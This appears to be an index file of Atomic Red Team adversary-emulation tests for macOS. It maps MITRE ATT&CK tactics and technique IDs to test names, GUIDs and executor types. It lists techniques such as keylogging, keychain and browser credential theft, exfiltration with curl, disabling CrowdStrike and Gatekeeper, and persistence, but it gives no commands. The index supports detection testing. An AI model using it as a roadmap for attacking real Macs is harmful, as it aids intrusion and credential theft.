privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
privilege-escalation,T1543.004,Create or Modify System Process: Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
privilege-escalation,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,2,Add macOS LoginItem using Applescript,716e756a-607b-41f3-8204-b214baf37c1d,bash
privilege-escalation,T1546.014,Event Triggered Execution: Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,2,MacOS - Load Kernel Module via kextload and kmutil,f4391089-d3a5-4dd1-ab22-0419527f2672,bash
privilege-escalation,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,3,MacOS - Load Kernel Module via KextManagerLoadKextWithURL(),f0007753-beb3-41ea-9948-760785e4c1e5,bash
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1037.005,Boot or Logon Initialization Scripts: Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
privilege-escalation,T1543.001,Create or Modify System Process: Launch Agent,2,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,1,Copy in loginwindow.plist for Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,sh
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,2,Re-Opened Applications using LoginHook,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
privilege-escalation,T1547.007,Boot or Logon Autostart Execution: Re-opened Applications,3,Append to existing loginwindow for Re-Opened Applications,766b6c3c-9353-4033-8b7e-38b309fa3a93,sh
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
credential-access,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
credential-access,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,14,Simulating Access to Chrome Login Data - MacOS,124e13e5-d8a1-4378-a6ee-a53cd0c7e369,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
discovery,T1040,Network Sniffing,2,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
discovery,T1040,Network Sniffing,7,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
discovery,T1040,Network Sniffing,8,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1082,System Information Discovery,12,Show System Integrity Protection status (MacOS),327cc050-9e99-4c8e-99b5-1d15f2fb6b96,sh
discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS,1ca1f9c7-44bc-46bb-8c85-c50e2e94267b,sh
discovery,T1217,Browser Bookmark Discovery,3,List Google Chrome Bookmark JSON Files on macOS,b789d341-154b-4a42-a071-9111588be9bc,sh
discovery,T1217,Browser Bookmark Discovery,8,List Safari Bookmarks on MacOS,5fc528dd-79de-47f5-8188-25572b7fafe0,sh
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
discovery,T1518.001,Software Discovery: Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
impact,T1531,Account Access Removal,4,Change User Password via passwd,3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6,sh
impact,T1531,Account Access Removal,5,Delete User via dscl utility,4d938c43-2fe8-4d70-a5b3-5bf239aa7846,sh
impact,T1531,Account Access Removal,6,Delete User via sysadminctl utility,d3812c4e-30ee-466a-a0aa-07e355b561d6,sh
impact,T1486,Data Encrypted for Impact,6,Encrypt files using 7z utility - macOS,645f0f5a-ef09-48d8-b9bc-f0e24c642d72,sh
impact,T1486,Data Encrypted for Impact,7,Encrypt files using openssl utility - macOS,1a01f6b8-b1e8-418e-bbe3-78a6f822759e,sh
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,bash
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,bash
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1059.002,Command and Scripting Interpreter: AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh
execution,T1569.001,System Services: Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
initial-access,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
63 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 7 Disable OpenDNS Umbrella 07f43b33-1e15-4e99-be70-bc094157c849 sh
64 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 8 Disable macOS Gatekeeper 2a821573-fb3f-4e71-92c3-daac7432f053 sh
65 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 9 Stop and unload Crowdstrike Falcon on macOS b3e7510c-2d4c-4249-a33f-591a2bc83eef sh
66 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
67 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 3 Install root CA on macOS cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 sh
68 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 3 C compile d0377aa6-850a-42b2-95f0-de558d80be57 bash
69 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 4 CC compile da97bb11-d6d0-4fc1-b445-e443d1346efe bash
70 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 5 Go compile 78bd3fa7-773c-449e-a978-dc1f1500bc52 bash
71 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 1 Delete a single file - Linux/macOS 562d737f-2fc6-4b09-8c2a-7f8ff0828480 sh
72 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 2 Delete an entire folder - Linux/macOS a415f17e-ce8d-4ce2-a8b4-83b674e7017e sh
73 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 3 Binary simply packed by UPX b16ef901-00bb-4dda-b4fc-a04db5067e20 sh
74 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 4 Binary packed by UPX, with modified headers 4d46e16b-5765-4046-9f25-a600d3e65e4d sh
75 defense-evasion T1036.006 Masquerading: Space after Filename 1 Space After Filename (Manual) 89a7dd26-e510-4c9f-9b15-f3bae333360f manual
76 defense-evasion T1036.006 Masquerading: Space after Filename 2 Space After Filename b95ce2eb-a093-4cd8-938d-5258cef656ea bash
77 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 1 Create a hidden file in a hidden directory 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be sh
78 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 2 Mac Hidden file cddb9098-3b47-4e01-9d3b-6f5f323288a9 sh
79 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 5 Hidden files 3b7015f2-3144-4205-b799-b05580621379 sh
80 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 6 Hide a Directory b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 sh
81 defense-evasion T1564.001 Hide Artifacts: Hidden Files and Directories 7 Show all hidden files 9a1ec7da-b892-449f-ad68-67066d04380c sh
82 defense-evasion T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
83 defense-evasion T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
84 defense-evasion T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
85 defense-evasion T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
86 persistence T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
87 persistence T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
88 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
89 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
90 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
91 persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
92 persistence T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
93 persistence T1543.004 Create or Modify System Process: Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
94 persistence T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 command_prompt
95 persistence T1546.005 Event Triggered Execution: Trap 1 Trap EXIT a74b2e07-5952-4c03-8b56-56274b076b61 sh
96 persistence T1546.005 Event Triggered Execution: Trap 2 Trap SIGINT a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 sh
97 persistence T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
98 persistence T1136.001 Create Account: Local Account 2 Create a user account on a MacOS system 01993ba5-1da3-4e15-a719-b690d4f0f0b2 bash
99 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
100 persistence T1547.015 Boot or Logon Autostart Execution: Login Items 2 Add macOS LoginItem using Applescript 716e756a-607b-41f3-8204-b214baf37c1d bash
101 persistence T1546.014 Event Triggered Execution: Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
102 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 2 MacOS - Load Kernel Module via kextload and kmutil f4391089-d3a5-4dd1-ab22-0419527f2672 bash
103 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 3 MacOS - Load Kernel Module via KextManagerLoadKextWithURL() f0007753-beb3-41ea-9948-760785e4c1e5 bash
104 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
105 persistence T1546.004 Event Triggered Execution: .bash_profile and .bashrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
106 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
107 persistence T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
108 persistence T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
109 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
110 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 1 Copy in loginwindow.plist for Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba sh
111 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 2 Re-Opened Applications using LoginHook 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
112 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 3 Append to existing loginwindow for Re-Opened Applications 766b6c3c-9353-4033-8b7e-38b309fa3a93 sh
113 persistence T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
114 persistence T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
115 persistence T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
116 persistence T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
117 command-and-control T1132.001 Data Encoding: Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
118 command-and-control T1090.003 Proxy: Multi-hop Proxy 4 Tor Proxy Usage - MacOS 12631354-fdbc-4164-92be-402527e748da sh
119 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
120 command-and-control T1071.001 Application Layer Protocol: Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
121 command-and-control T1105 Ingress Tool Transfer 1 rsync remote file copy (push) 0fc6e977-cb12-44f6-b263-2824ba917409 bash
122 command-and-control T1105 Ingress Tool Transfer 2 rsync remote file copy (pull) 3180f7d5-52c0-4493-9ea0-e3431a84773f bash
123 command-and-control T1105 Ingress Tool Transfer 3 scp remote file copy (push) 83a49600-222b-4866-80a0-37736ad29344 bash
124 command-and-control T1105 Ingress Tool Transfer 4 scp remote file copy (pull) b9d22b9a-9778-4426-abf0-568ea64e9c33 bash
125 command-and-control T1105 Ingress Tool Transfer 5 sftp remote file copy (push) f564c297-7978-4aa9-b37a-d90477feea4e bash
126 command-and-control T1105 Ingress Tool Transfer 6 sftp remote file copy (pull) 0139dba1-f391-405e-a4f5-f3989f2c88ef bash
127 command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
128 command-and-control T1090.001 Proxy: Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
129 command-and-control T1090.001 Proxy: Internal Proxy 2 Connection Proxy for macOS UI 648d68c1-8bcd-4486-9abe-71c6655b6a2c sh
130 collection T1560.001 Archive Collected Data: Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 sh
131 collection T1560.001 Archive Collected Data: Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
132 collection T1560.001 Archive Collected Data: Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
133 collection T1560.001 Archive Collected Data: Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
134 collection T1560.001 Archive Collected Data: Archive via Utility 9 Encrypts collected data with AES-256 and Base64 a743e3a6-e8b2-4a30-abe7-ca85d201b5d3 bash
135 collection T1113 Screen Capture 1 Screencapture 0f47ceb1-720f-4275-96b8-21f0562217ac bash
136 collection T1113 Screen Capture 2 Screencapture (silent) deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 bash
137 collection T1056.001 Input Capture: Keylogging 7 MacOS Swift Keylogger aee3a097-4c5c-4fff-bbd3-0a705867ae29 bash
138 collection T1123 Audio Capture 3 using Quicktime Player c7a0bb71-70ce-4a53-b115-881f241b795b sh
139 collection T1074.001 Data Staged: Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 bash
140 collection T1115 Clipboard Data 3 Execute commands from clipboard 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff bash
141 collection T1056.002 Input Capture: GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
142 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
143 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
144 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
145 privilege-escalation T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
146 privilege-escalation T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
147 privilege-escalation T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
148 privilege-escalation T1543.004 Create or Modify System Process: Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
149 privilege-escalation T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 command_prompt
150 privilege-escalation T1546.005 Event Triggered Execution: Trap 1 Trap EXIT a74b2e07-5952-4c03-8b56-56274b076b61 sh
151 privilege-escalation T1546.005 Event Triggered Execution: Trap 2 Trap SIGINT a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 sh
152 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
153 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
154 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
155 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
156 privilege-escalation T1547.015 Boot or Logon Autostart Execution: Login Items 2 Add macOS LoginItem using Applescript 716e756a-607b-41f3-8204-b214baf37c1d bash
157 privilege-escalation T1546.014 Event Triggered Execution: Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
158 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 2 MacOS - Load Kernel Module via kextload and kmutil f4391089-d3a5-4dd1-ab22-0419527f2672 bash
159 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 3 MacOS - Load Kernel Module via KextManagerLoadKextWithURL() f0007753-beb3-41ea-9948-760785e4c1e5 bash
160 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
161 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
